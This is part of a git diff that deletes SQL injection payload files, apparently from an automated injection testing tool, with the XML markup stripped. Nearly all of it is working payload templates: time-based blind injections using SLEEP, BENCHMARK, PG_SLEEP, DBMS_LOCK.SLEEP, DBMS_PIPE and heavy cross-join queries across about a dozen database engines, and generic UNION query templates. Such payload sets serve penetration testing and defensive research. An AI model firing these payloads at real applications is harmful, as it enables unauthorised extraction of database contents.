- OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
- --
-
-
-
-
-
- Firebird
- >= 2.0
-
-
-
-
- SAP MaxDB AND time-based blind (heavy query)
- 5
- 4
- 2
- 1,2,3,9
- 1
- AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
-
-
-
-
-
- SAP MaxDB
-
-
-
-
- SAP MaxDB OR time-based blind (heavy query)
- 5
- 4
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
-
-
-
-
-
- SAP MaxDB
-
-
-
-
- SAP MaxDB AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3,9
- 1
- AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
- --
-
-
-
-
-
- SAP MaxDB
-
-
-
-
- SAP MaxDB OR time-based blind (heavy query - comment)
- 5
- 5
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
- --
-
-
-
-
-
- SAP MaxDB
-
-
-
-
- HSQLDB >= 1.7.2 AND time-based blind (heavy query)
- 5
- 4
- 2
- 1,2,3,9
- 1
- AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END
-
- AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)
-
-
-
-
-
- HSQLDB
- >= 1.7.2
-
-
-
-
- HSQLDB >= 1.7.2 OR time-based blind (heavy query)
- 5
- 4
- 3
- 1,2,3,9
- 1
- OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END
-
- OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)
-
-
-
-
-
- HSQLDB
- >= 1.7.2
-
-
-
-
- HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3,9
- 1
- AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END
-
- AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)
- --
-
-
-
-
-
- HSQLDB
- >= 1.7.2
-
-
-
-
- HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment)
- 5
- 5
- 3
- 1,2,3,9
- 1
- OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END
-
- OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)
- --
-
-
-
-
-
- HSQLDB
- >= 1.7.2
-
-
-
-
- HSQLDB > 2.0 AND time-based blind (heavy query)
- 5
- 4
- 2
- 1,2,3,9
- 1
- AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END
-
- AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
-
-
-
-
-
- HSQLDB
- > 2.0
-
-
-
-
- HSQLDB > 2.0 OR time-based blind (heavy query)
- 5
- 4
- 3
- 1,2,3,9
- 1
- OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END
-
- OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
-
-
-
-
-
- HSQLDB
- > 2.0
-
-
-
-
- HSQLDB > 2.0 AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3,9
- 1
- AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END
-
- AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
- --
-
-
-
-
-
- HSQLDB
- > 2.0
-
-
-
-
- HSQLDB > 2.0 OR time-based blind (heavy query - comment)
- 5
- 5
- 3
- 1,2,3,9
- 1
- OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END
-
- OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
- --
-
-
-
-
-
- HSQLDB
- > 2.0
-
-
-
-
- Informix AND time-based blind (heavy query)
- 5
- 2
- 2
- 1,2,3,9
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)
-
-
-
-
-
- Informix
-
-
-
-
- Informix OR time-based blind (heavy query)
- 5
- 2
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)
-
-
-
-
-
- Informix
-
-
-
-
- Informix AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3,9
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)
- --
-
-
-
-
-
- Informix
-
-
-
-
- Informix OR time-based blind (heavy query - comment)
- 5
- 5
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)
- --
-
-
-
-
-
- Informix
-
-
-
-
- ClickHouse AND time-based blind (heavy query)
- 5
- 4
- 1
- 1,2,3
- 1
- AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))
-
- AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))
-
-
-
-
-
- ClickHouse
-
-
-
-
- ClickHouse OR time-based blind (heavy query)
- 5
- 5
- 3
- 1,2,3
- 1
- OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))
-
- OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))
-
-
-
-
-
- ClickHouse
-
-
-
-
-
-
-
-
- MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
- 5
- 3
- 2
- 1,2,3,4,5
- 1
- PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)
-
- PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)
- 5
- 5
- 2
- 1,2,3,4,5
- 1
- PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)
-
- PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)
- #
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
-
-
- MySQL >= 5.0.12 time-based blind - Parameter replace
- 5
- 2
- 1
- 1,2,3,9
- 3
- (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)
-
- (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
- 5
- 3
- 1
- 1,2,3,9
- 3
- (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)
- 5
- 4
- 2
- 1,2,3,9
- 3
- (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])
-
- (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])
-
-
-
-
-
- MySQL
- < 5.0.12
-
-
-
-
- MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)
- 5
- 5
- 2
- 1,2,3,9
- 3
- IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
-
- (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
-
-
-
-
-
- MySQL
- > 5.0.12
-
-
-
-
- MySQL time-based blind - Parameter replace (bool)
- 5
- 4
- 1
- 1,2,3,9
- 3
- ([INFERENCE] AND SLEEP([SLEEPTIME]))
-
- ([RANDNUM]=[RANDNUM] AND SLEEP([SLEEPTIME]))
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL time-based blind - Parameter replace (ELT)
- 5
- 5
- 1
- 1,2,3,9
- 3
- ELT([INFERENCE],SLEEP([SLEEPTIME]))
-
- ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL time-based blind - Parameter replace (MAKE_SET)
- 5
- 5
- 1
- 1,2,3,9
- 3
- MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))
-
- MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
-
-
-
-
-
- MySQL
-
-
-
-
- PostgreSQL > 8.1 time-based blind - Parameter replace
- 5
- 3
- 1
- 1,2,3,9
- 3
- (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
-
- (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
-
-
-
-
-
- PostgreSQL
- > 8.1
-
-
-
-
- PostgreSQL time-based blind - Parameter replace (heavy query)
- 5
- 4
- 2
- 1,2,3,9
- 3
- (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
-
- (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
-
-
-
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)
- 5
- 4
- 2
- 1,3,9
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))
-
-
-
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
-
- Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)
- 5
- 3
- 1
- 1,3,9
- 3
- BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;
-
- BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)
- 5
- 3
- 1
- 1,3,9
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle time-based blind - Parameter replace (heavy queries)
- 5
- 4
- 2
- 1,3,9
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)
-
-
-
-
-
- Oracle
-
-
-
-
- SQLite > 2.0 time-based blind - Parameter replace (heavy query)
- 5
- 4
- 2
- 1,2,3,9
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))
-
- (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))
-
-
-
-
-
- SQLite
- > 2.0
-
-
-
-
- Firebird time-based blind - Parameter replace (heavy query)
- 5
- 5
- 2
- 1,2,3,9
- 3
- IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
-
- (SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
-
-
-
-
-
- Firebird
- >= 2.0
-
-
-
-
- SAP MaxDB time-based blind - Parameter replace (heavy query)
- 5
- 5
- 2
- 1,3,9
- 3
- (SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
-
- (SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
-
-
-
-
-
- SAP MaxDB
-
-
-
-
- IBM DB2 time-based blind - Parameter replace (heavy query)
- 5
- 5
- 2
- 1,2,3,9
- 3
- (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
-
- (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
-
-
-
-
-
- IBM DB2
-
-
-
-
-
- HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query)
- 5
- 4
- 2
- 1,2,3,9
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
-
-
-
-
-
- HSQLDB
- >= 1.7.2
-
-
-
-
- HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)
- 5
- 5
- 2
- 1,2,3,9
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
-
-
-
-
-
- HSQLDB
- > 2.0
-
-
-
-
- Informix time-based blind - Parameter replace (heavy query)
- 5
- 4
- 2
- 1,2,3,9
- 3
- (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)
-
- (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)
-
-
-
-
-
- Informix
-
-
-
-
-
-
- MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause
- 5
- 3
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)
- 5
- 4
- 2
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
-
-
-
-
-
- MySQL
- < 5.0.12
-
-
-
-
- PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause
- 5
- 3
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))
-
-
-
-
-
- PostgreSQL
- > 8.1
-
-
-
-
- PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query)
- 5
- 4
- 2
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))
-
-
-
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)
- 5
- 4
- 2
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
-
-
-
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)
- 5
- 3
- 1
- 2,3
- 1
- ,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
-
- ,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)
- 5
- 3
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)
- 5
- 4
- 2
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
-
-
-
-
- Oracle
-
-
-
-
- HSQLDB >= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query)
- 5
- 4
- 2
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
- --
-
-
-
-
-
- HSQLDB
- >= 1.7.2
-
-
-
-
- HSQLDB > 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query)
- 5
- 4
- 2
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))
-
-
-
-
-
- HSQLDB
- > 2.0
-
-
-
-
-
diff --git a/data/xml/payloads/union_query.xml b/data/xml/payloads/union_query.xml
deleted file mode 100644
index 9513892fafb..00000000000
--- a/data/xml/payloads/union_query.xml
+++ /dev/null
@@ -1,742 +0,0 @@
-
-
-
-
-
- Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)
- 6
- 1
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- [CHAR]
- [COLSTART]-[COLSTOP]
-
-
-
-
-
-
-
- Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)
- 6
- 1
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- NULL
- [COLSTART]-[COLSTOP]
-
-
-
-
-
-
-
- Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)
- 6
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- [RANDNUM]
- [COLSTART]-[COLSTOP]
-
-
-
-
-
-
-
- Generic UNION query ([CHAR]) - 1 to 10 columns
- 6
- 1
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- [CHAR]
- 1-10
-
-
-
-
-
-
-
- Generic UNION query (NULL) - 1 to 10 columns
- 6
- 1
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- NULL
- 1-10
-
-
-
-
-
-
-
- Generic UNION query ([RANDNUM]) - 1 to 10 columns
- 6
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- [RANDNUM]
- 1-10
-
-
-
-
-
-
-
- Generic UNION query ([CHAR]) - 11 to 20 columns
- 6
- 2
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- [CHAR]
- 11-20
-
-
-
-
-
-
-
- Generic UNION query (NULL) - 11 to 20 columns
- 6
- 2
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- NULL
- 11-20
-
-
-
-
-
-
-
- Generic UNION query ([RANDNUM]) - 11 to 20 columns
- 6
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- [RANDNUM]
- 11-20
-
-
-
-
-
-
-
